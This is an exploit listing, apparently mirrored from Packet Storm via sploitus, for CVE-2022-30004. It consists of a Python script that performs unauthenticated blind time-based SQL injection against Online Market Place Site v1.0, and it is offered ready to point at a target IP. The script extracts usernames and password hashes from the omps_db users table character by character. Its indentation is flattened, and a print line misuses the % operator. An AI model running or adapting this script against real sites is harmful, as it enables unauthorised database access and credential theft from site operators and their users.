Exploit for Online Market Place Site 1.0 SQL Injection CVE-2022-30004

Name: Exploit for Online Market Place Site 1.0 SQL Injection CVE-2022-30004
Rating: 5 (192 reviews)
2022-09-05 | CVSS 0.1
## https://sploitus.com/exploit?id=PACKETSTORM:168249
# Exploit Title: Online Market Place Site v1.0 - Unauthenticated Blind Time-Based SQL Injection  
# Exploit Author: Joe Pollock  
# Date: September 03, 2022  
# Vendor Homepage: https://www.sourcecodester.com/php/15273/online-market-place-site-phpoop-free-source-code.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/omps.zip  
# Tested on: Kali Linux, Apache, Mysql  
# CVE: CVE-2022-30004 (RESERVED)  
# Vendor: oretnom23  
# Version: v1.0  
# Exploit Description:  
# Online Market Place Site v1.0 suffers from an unauthenticated blind SQL Injection Vulnerability allowing remote attackers to dump the SQL database via time-based SQL injection.  
# This script will retrieve a single username and associciated password hash from the omps_db database via blind, time-based SQL injection.  
# By default, the username & hash retrieved will have an ID equal to zero in the database, i.e. the first username and password hash.  
# Default behavior can be changed by setting the USERID variable. Sleep timings may also have to be adjusted to account for network latency.  
# Ex: python3 omps.py 10.14.14.2  
import sys, requests, urllib3  
USERID=0  
  
def main():  
if len(sys.argv) != 2:  
print("(+) usage: %s <target>") % sys.argv[0]  
print('(+) eg: %s 192.168.121.103') % sys.argv[0]  
sys.exit(-1)  
ip = sys.argv[1]  
print("(+) Retrieving username and hash...")  
target = "http://%s/omps/classes/Users.php?f=save_user" % ip  
  
# Get username  
for p in range (1,30):  
injection_string = "AAAA' OR IF(ascii(MID((select username from omps_db.users LIMIT %d,1),%d,1))=[CHAR],sleep(1),0)-- -" % (USERID,p)  
for c in range(32, 126):  
files = {"username": (None, injection_string.replace("[CHAR]", str(c)))}  
#print(injection_string.replace("[CHAR]", str(c)))  
r = requests.post(target, files=files)  
if (r.elapsed.total_seconds() > 2):  
extracted_char = chr(c)  
sys.stdout.write(extracted_char)  
sys.stdout.flush()  
sys.stdout.write("\t")  
  
# Get password hash  
for p in range (1,65):  
injection_string = "AAAA' OR IF(ascii(MID((select password from omps_db.users LIMIT %d,1),%d,1))=[CHAR],sleep(1),0)-- -" % (USERID,p)  
for c in range(32, 126):  
files = {"username": (None, injection_string.replace("[CHAR]", str(c)))}  
#print(injection_string.replace("[CHAR]", str(c)))  
r = requests.post(target, files=files)  
if (r.elapsed.total_seconds() > 2):  
extracted_char = chr(c)  
sys.stdout.write(extracted_char)  
sys.stdout.flush()  
print("\n(+) done!")  
  
if __name__ == "__main__":  
main()